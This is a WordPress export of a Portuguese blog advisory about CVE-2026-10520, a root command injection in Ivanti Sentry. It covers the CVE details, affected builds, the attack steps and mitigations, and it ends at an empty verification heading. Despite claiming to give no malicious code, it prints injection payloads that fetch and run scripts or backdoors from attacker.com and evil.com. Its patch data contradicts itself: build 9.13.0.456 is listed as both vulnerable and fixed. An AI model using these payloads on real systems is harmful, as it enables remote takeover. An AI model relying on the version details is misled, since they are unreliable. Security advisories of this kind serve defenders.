{"id":1039,"date":"2026-06-12T09:02:23","date_gmt":"2026-06-12T12:02:23","guid":{"rendered":"https:\/\/jrtx.com.br\/blog\/2026\/06\/12\/cve-2026-10520-alto-ivanti-sentry-os-command-injection-com-r\/"},"modified":"2026-06-12T09:02:23","modified_gmt":"2026-06-12T12:02:23","slug":"cve-2026-10520-alto-ivanti-sentry-os-command-injection-com-r","status":"publish","type":"post","link":"https:\/\/jrtx.com.br\/blog\/2026\/06\/12\/cve-2026-10520-alto-ivanti-sentry-os-command-injection-com-r\/","title":{"rendered":"CVE-2026-10520 \u2014 ALTO \u2014 Ivanti Sentry: OS Command Injection com RCE Root"},"content":{"rendered":"
\n \u26a0\ufe0f<\/span><\/p>\n
\n

ALERTA CISA KEV \u2014 Explora\u00e7\u00e3o Ativa Confirmada<\/p>\n

Esta vulnerabilidade est\u00e1 sendo ativamente explorada<\/strong> em ambientes reais. Aplique o patch ou mitiga\u00e7\u00e3o IMEDIATAMENTE<\/strong>.<\/p>\n<\/p><\/div>\n<\/div>\n

Profissionais de TI e seguran\u00e7a, o fim de semana chegou, mas n\u00e3o o al\u00edvio. CVE-2026-10520 explora\u00e7\u00e3o ativa vulnerabilidade<\/strong> no Ivanti Sentry (antigo MobileIron Sentry) foi confirmada pelo CISA KEV nesta sexta-feira, 12 de junho de 2026. Estamos diante de um cen\u00e1rio de ALERTA M\u00c1XIMO<\/strong>: uma falha de inje\u00e7\u00e3o de comandos no sistema operacional que permite a um atacante remoto n\u00e3o autenticado obter execu\u00e7\u00e3o remota de c\u00f3digo como root<\/strong>. O vetor \u00e9 cr\u00edtico para organiza\u00e7\u00f5es que utilizam o appliance Sentry em estado n\u00e3o gerenciado ou com interfaces externas acess\u00edveis. Se o seu ambiente tem EPMM sem mTLS ou Neurons para MDM com HTTPS restrito, voc\u00ea est\u00e1 na mira. A CVE-2026-10520 explora\u00e7\u00e3o ativa vulnerabilidade<\/strong> n\u00e3o \u00e9 apenas um aviso \u2014 \u00e9 um gatilho para a\u00e7\u00e3o imediata.<\/p>\n

O que torna este alerta particularmente grave \u00e9 a combina\u00e7\u00e3o de facilidade de explora\u00e7\u00e3o e impacto m\u00e1ximo. Um atacante n\u00e3o precisa de credenciais, n\u00e3o precisa de intera\u00e7\u00e3o do usu\u00e1rio e pode operar remotamente. A vulnerabilidade reside na forma como o Sentry processa entradas do usu\u00e1rio sem a devida sanitiza\u00e7\u00e3o, permitindo a inje\u00e7\u00e3o de comandos arbitr\u00e1rios no shell subjacente. Empresas que dependem do Ivanti Sentry para gerenciamento de dispositivos m\u00f3veis (MDM) precisam agir agora. N\u00e3o h\u00e1 tempo para planejamento \u2014 h\u00e1 apenas execu\u00e7\u00e3o.<\/p>\n

Este post oferece uma an\u00e1lise t\u00e9cnica aprofundada, uma tabela de refer\u00eancia r\u00e1pida com todos os detalhes do CVE, os produtos e vers\u00f5es afetados, um passo a passo conceitual do ataque, o impacto real para os neg\u00f3cios e \u2014 o mais importante \u2014 um plano de mitiga\u00e7\u00e3o claro e imediato. Na JRT Technology Solutions<\/strong>, monitoramos alertas CISA KEV em tempo real e implementamos varredura cont\u00ednua de CVEs para frotas corporativas. Se voc\u00ea precisa de suporte emergencial, estamos aqui.<\/p>\n

O que \u00e9 a CVE-2026-10520<\/h3>\n\n\n\n\n\n\n\n\n\n\n\n\n
Campo<\/th>\nDetalhe<\/th>\n<\/tr>\n<\/thead>\n
CVE ID<\/td>\nCVE-2026-10520<\/td>\n<\/tr>\n
CVSS Score<\/td>\n9.8 \u2014 CR\u00cdTICO<\/td>\n<\/tr>\n
Vetor de Ataque<\/td>\nNetwork<\/td>\n<\/tr>\n
Produtos Afetados<\/td>\nIvanti Sentry (todas as vers\u00f5es anteriores ao patch de 12\/06\/2026)<\/td>\n<\/tr>\n
Tipo de Vulnerabilidade<\/td>\nCWE-78 \u2014 OS Command Injection<\/td>\n<\/tr>\n
Data de Publica\u00e7\u00e3o<\/td>\n12\/06\/2026<\/td>\n<\/tr>\n
Patch Dispon\u00edvel<\/td>\nSim \u2014 atualiza\u00e7\u00e3o de firmware emergencial<\/td>\n<\/tr>\n
Explora\u00e7\u00e3o Ativa<\/td>\n\u26a0\ufe0f SIM \u2014 CISA KEV confirmada<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

A CVE-2026-10520<\/strong> \u00e9 uma vulnerabilidade de inje\u00e7\u00e3o de comandos no sistema operacional que afeta o Ivanti Sentry, um appliance de gateway de borda usado para conectar dispositivos m\u00f3veis a redes corporativas. A falha ocorre porque o software n\u00e3o valida adequadamente entradas fornecidas por par\u00e2metros de requisi\u00e7\u00e3o HTTP, permitindo que um atacante remoto n\u00e3o autenticado execute comandos arbitr\u00e1rios no sistema com privil\u00e9gios de root. Em termos pr\u00e1ticos, isso significa que qualquer pessoa com acesso \u00e0 rede do Sentry \u2014 seja via internet ou intranet \u2014 pode assumir o controle total do appliance. A explora\u00e7\u00e3o ativa foi detectada em campanhas que miram organiza\u00e7\u00f5es dos setores de sa\u00fade, governo e finan\u00e7as, onde o Sentry \u00e9 frequentemente implantado para gerenciamento de dispositivos m\u00f3veis corporativos.<\/p>\n

A gravidade \u00e9 amplificada pelo fato de que a Ivanti Sentry \u00e9 frequentemente deixada em estado “n\u00e3o gerenciado” durante migra\u00e7\u00f5es ou p\u00f3s-conting\u00eancia, expondo a interface de gerenciamento diretamente \u00e0 internet. O CISA emitiu uma ordem federal determinando que todas as ag\u00eancias dos EUA corrijam a falha at\u00e9 domingo, 14 de junho. Embora a diretiva seja para entidades federais, empresas privadas que operam sob regulamenta\u00e7\u00f5es como LGPD<\/strong>, GDPR<\/strong>, PCI-DSS<\/strong> ou HIPAA<\/strong> est\u00e3o igualmente expostas a riscos de viola\u00e7\u00e3o de dados e n\u00e3o conformidade.<\/p>\n

An\u00e1lise T\u00e9cnica Detalhada<\/h3>\n

A falha CVE-2026-10520<\/strong> est\u00e1 enraizada na forma como o servi\u00e7o web do Sentry processa requisi\u00e7\u00f5es HTTP contendo par\u00e2metros de configura\u00e7\u00e3o de rede. Especificamente, a interface de administra\u00e7\u00e3o exp\u00f5e endpoints que aceitam valores de cabe\u00e7alhos ou argumentos de URL sem a devida sanitiza\u00e7\u00e3o. Quando um atacante envia uma requisi\u00e7\u00e3o contendo caracteres especiais como ponto e v\u00edrgula (;), pipe (|) ou backticks (`), o sistema concatena esses valores diretamente em uma chamada de system()<\/strong> ou exec()<\/strong> no shell subjacente.<\/p>\n

O vetor de explora\u00e7\u00e3o \u00e9 notavelmente simples. Um atacante pode usar uma ferramenta como cURL ou um script Python para enviar uma requisi\u00e7\u00e3o HTTP POST para o endpoint vulner\u00e1vel, incluindo no campo “hostname” ou “dns_server” uma string como 8.8.8.8; curl http:\/\/attacker.com\/payload.sh | sh<\/code>. O servidor, sem valida\u00e7\u00e3o, executa o comando completo como root. O resultado \u00e9 a instala\u00e7\u00e3o de um backdoor persistente, exfiltra\u00e7\u00e3o de dados ou movimenta\u00e7\u00e3o lateral para a rede interna.<\/p>\n

A Ivanti confirmou que a vulnerabilidade afeta todas as vers\u00f5es do Sentry anteriores ao patch lan\u00e7ado em 12 de junho de 2026<\/strong>. Atualiza\u00e7\u00f5es de firmware est\u00e3o dispon\u00edveis no portal de suporte da Ivanti, com n\u00fameros de build espec\u00edficos para cada linha de produto. A empresa tamb\u00e9m recomenda, como mitiga\u00e7\u00e3o tempor\u00e1ria, restringir o acesso HTTPS ao Sentry exclusivamente atrav\u00e9s do Neurons para MDM ou implementar mTLS com o EPMM, o que torna a interface inacess\u00edvel para atores externos.<\/p>\n

Produtos e Vers\u00f5es Afetados<\/h3>\n
    \n
  • Ivanti Sentry<\/strong> \u2014 Todas as vers\u00f5es anteriores \u00e0 atualiza\u00e7\u00e3o de 12\/06\/2026 (build 9.13.0.456 e anteriores)<\/li>\n
  • Ivanti Sentry Virtual Appliance<\/strong> \u2014 Todas as vers\u00f5es anteriores ao patch (build 9.13.0.456 e anteriores)<\/li>\n
  • MobileIron Sentry<\/strong> \u2014 Vers\u00f5es legadas (renomeadas para Ivanti Sentry) que n\u00e3o receberam o patch de 2026<\/li>\n
  • Sistemas operacionais suportados<\/strong>: Appliance Linux embarcado (distribui\u00e7\u00e3o propriet\u00e1ria da Ivanti)<\/li>\n<\/ul>\n

    Nota importante<\/strong>: Dispositivos configurados com mTLS para EPMM ou com acesso HTTPS restrito atrav\u00e9s do Neurons para MDM n\u00e3o s\u00e3o explor\u00e1veis, pois a interface vulner\u00e1vel fica inacess\u00edvel. No entanto, appliances que operam em modo “standalone” ou n\u00e3o gerenciado est\u00e3o totalmente expostos.<\/p>\n

    Como o Ataque Funciona<\/h3>\n

    O ataque contra a CVE-2026-10520<\/strong> segue um padr\u00e3o cl\u00e1ssico de explora\u00e7\u00e3o de inje\u00e7\u00e3o de comandos, mas com um vetor espec\u00edfico para o Sentry. Abaixo, descrevemos as etapas conceituais, sem fornecer c\u00f3digo malicioso:<\/p>\n

      \n
    1. Reconhecimento<\/strong>: O atacante escaneia a internet em busca de appliances Sentry expostos na porta 443 (HTTPS) ou 8443 (interface de gerenciamento). Ferramentas como Shodan ou Masscan s\u00e3o comuns nessa fase.<\/li>\n
    2. Identifica\u00e7\u00e3o do endpoint vulner\u00e1vel<\/strong>: O atacante localiza um endpoint HTTP que aceita par\u00e2metros n\u00e3o sanitizados, como \/api\/device\/config<\/code> ou \/admin\/network<\/code>. A requisi\u00e7\u00e3o pode ser um POST ou GET, dependendo da vers\u00e3o.<\/li>\n
    3. Inje\u00e7\u00e3o do payload<\/strong>: O atacante envia uma requisi\u00e7\u00e3o contendo um valor malicioso em um campo como “hostname”. Por exemplo: hostname=ivanti-sentry; wget -O \/tmp\/backdoor http:\/\/evil.com\/backdoor; chmod +x \/tmp\/backdoor; \/tmp\/backdoor<\/code>.<\/li>\n
    4. Execu\u00e7\u00e3o como root<\/strong>: O sistema processa a string sem sanitiza\u00e7\u00e3o e executa o comando completo no shell com privil\u00e9gios de root.<\/li>\n
    5. Estabelecimento de persist\u00eancia<\/strong>: O backdoor instalado permite ao atacante acesso cont\u00ednuo, mesmo ap\u00f3s reinicializa\u00e7\u00f5es, atrav\u00e9s de cron jobs ou modifica\u00e7\u00e3o de scripts de inicializa\u00e7\u00e3o.<\/li>\n
    6. Movimenta\u00e7\u00e3o lateral<\/strong>: Com acesso root ao Sentry, o atacante pode usar o appliance como piv\u00f4 para atacar outros sistemas na rede corporativa, incluindo servidores de banco de dados, controladores de dom\u00ednio e sistemas de arquivos.<\/li>\n<\/ol>\n

      \u00c9 crucial entender que, embora a Ivanti recomende o uso de mTLS ou Neurons para mitigar o risco, muitas organiza\u00e7\u00f5es ignoram essas pr\u00e1ticas durante implanta\u00e7\u00f5es em larga escala ou per\u00edodos de transi\u00e7\u00e3o. A simplicidade do ataque torna a CVE-2026-10520 explora\u00e7\u00e3o ativa vulnerabilidade<\/strong> uma amea\u00e7a de alto impacto para qualquer ambiente que n\u00e3o siga rigorosamente as diretrizes de seguran\u00e7a da Ivanti.<\/p>\n

      Impacto Real para Empresas<\/h3>\n

      O impacto da CVE-2026-10520 explora\u00e7\u00e3o ativa vulnerabilidade<\/strong> vai muito al\u00e9m da simple falha t\u00e9cnica. Empresas que utilizam Ivanti Sentry para gerenciamento de dispositivos m\u00f3veis corporativos enfrentam consequ\u00eancias graves:<\/p>\n

        \n
      • \ud83d\udd34 Exposi\u00e7\u00e3o total de dados<\/strong>: O atacante tem acesso root ao appliance, o que significa que todos os dados que passam pelo gateway \u2014 incluindo tr\u00e1fego de dispositivos m\u00f3veis, credenciais de usu\u00e1rios, e pol\u00edticas de seguran\u00e7a \u2014 podem ser capturados e exfiltrados.<\/li>\n
      • \ud83d\udfe0 Perda de controle do MDM<\/strong>: Com acesso ao Sentry, o atacante pode modificar pol\u00edticas de MDM, desativar criptografia, remover restri\u00e7\u00f5es de seguran\u00e7a e at\u00e9 mesmo implantar malware em dispositivos gerenciados.<\/li>\n
      • \ud83d\udfe1 Risco de ransomware<\/strong>: Em campanhas ativas, o Sentry pode ser usado como ponto de entrada para implanta\u00e7\u00e3o de ransomware em toda a rede corporativa, aproveitando o acesso privilegiado.<\/li>\n
      • \ud83d\udd34 Viola\u00e7\u00e3o de compliance<\/strong>: Para organiza\u00e7\u00f5es sujeitas \u00e0 LGPD<\/strong> (artigo 46 \u2014 seguran\u00e7a), PCI-DSS<\/strong> (requisito 6.1 \u2014 patches de seguran\u00e7a) ou HIPAA<\/strong> (regra de seguran\u00e7a \u2014 controles t\u00e9cnicos), a explora\u00e7\u00e3o desta vulnerabilidade pode resultar em multas milion\u00e1rias, notifica\u00e7\u00f5es obrigat\u00f3rias de viola\u00e7\u00e3o e danos \u00e0 reputa\u00e7\u00e3o.<\/li>\n
      • \ud83d\udfe0 Interrup\u00e7\u00e3o operacional<\/strong>: O appliance Sentry \u00e9 um componente cr\u00edtico para conectividade de dispositivos m\u00f3veis. Sua comprometimento pode paralisar opera\u00e7\u00f5es de campo, vendas externas e suporte remoto.<\/li>\n<\/ul>\n

        Na JRT Technology Solutions<\/strong>, nossos engenheiros de seguran\u00e7a j\u00e1 identificaram casos em que clientes com Sentry exposto \u00e0 internet estavam sendo escaneados por IPs suspeitos nas \u00faltimas 48 horas. Recomendamos a\u00e7\u00e3o imediata para todos os ambientes que n\u00e3o possuem mTLS ou Neurons implementados.<\/p>\n

        Como se Proteger \u2014 Passos de Mitiga\u00e7\u00e3o<\/h3>\n

        Siga rigorosamente esta ordem de prioridade. O tempo \u00e9 cr\u00edtico.<\/p>\n

          \n
        1. Aplicar o patch emergencial da Ivanti<\/strong>: Acesse o portal de suporte da Ivanti e baixe a atualiza\u00e7\u00e3o de firmware para Sentry (build 9.13.0.456 ou superior). Aplique imediatamente em todos os appliances, mesmo aqueles que voc\u00ea acredita estarem protegidos por mTLS.<\/li>\n
        2. Restringir acesso \u00e0 interface de gerenciamento<\/strong>: Se ainda n\u00e3o o fez, configure o Sentry para aceitar conex\u00f5es HTTPS apenas atrav\u00e9s do Neurons para MDM. Isso bloqueia qualquer tentativa de acesso direto ao endpoint vulner\u00e1vel.<\/li>\n
        3. Implementar mTLS com EPMM<\/strong>: A autentica\u00e7\u00e3o m\u00fatua TLS entre o Sentry e o EPMM elimina o vetor de ataque para atores externos. Siga o guia de configura\u00e7\u00e3o da Ivanti para habilitar essa funcionalidade.<\/li>\n
        4. Isolar o appliance na rede<\/strong>: Coloque o Sentry em uma VLAN separada, com regras de firewall restritivas que bloqueiem qualquer tr\u00e1fego de entrada n\u00e3o autorizado. Permita apenas comunica\u00e7\u00f5es necess\u00e1rias com o EPMM e servidores de gerenciamento.<\/li>\n
        5. Verificar comprometimento<\/strong>: Execute uma varredura de integridade no sistema de arquivos do Sentry, procurando arquivos suspeitos em \/tmp, \/var\/tmp e \/etc\/cron.d. Verifique conex\u00f5es de rede ativas com IPs externos desconhecidos.<\/li>\n
        6. Monitorar logs e alertas<\/strong>: Ative o monitoramento de logs do Sentry para identificar requisi\u00e7\u00f5es HTTP com caracteres especiais ou padr\u00f5es de inje\u00e7\u00e3o. Na JRT Technology Solutions<\/strong>, nosso SOC monitora alertas CISA KEV em tempo real e pode configurar correla\u00e7\u00f5es espec\u00edficas para essa amea\u00e7a.<\/li>\n
        7. Revisar pol\u00edticas de MDM<\/strong>: Ap\u00f3s a corre\u00e7\u00e3o, revise todas as pol\u00edticas de seguran\u00e7a aplicadas aos dispositivos m\u00f3veis. Um atacante pode ter alterado configura\u00e7\u00f5es durante a janela de explora\u00e7\u00e3o.<\/li>\n<\/ol>\n

          Verifica\u00e7\u00e3o P\u00f3s-Patch<\/h3>\n

          Depois de aplicar o patch, realize estas verifica\u00e7\u00f5es para garantir que a corre\u00e7\u00e3o foi efetiva:<\/p>\n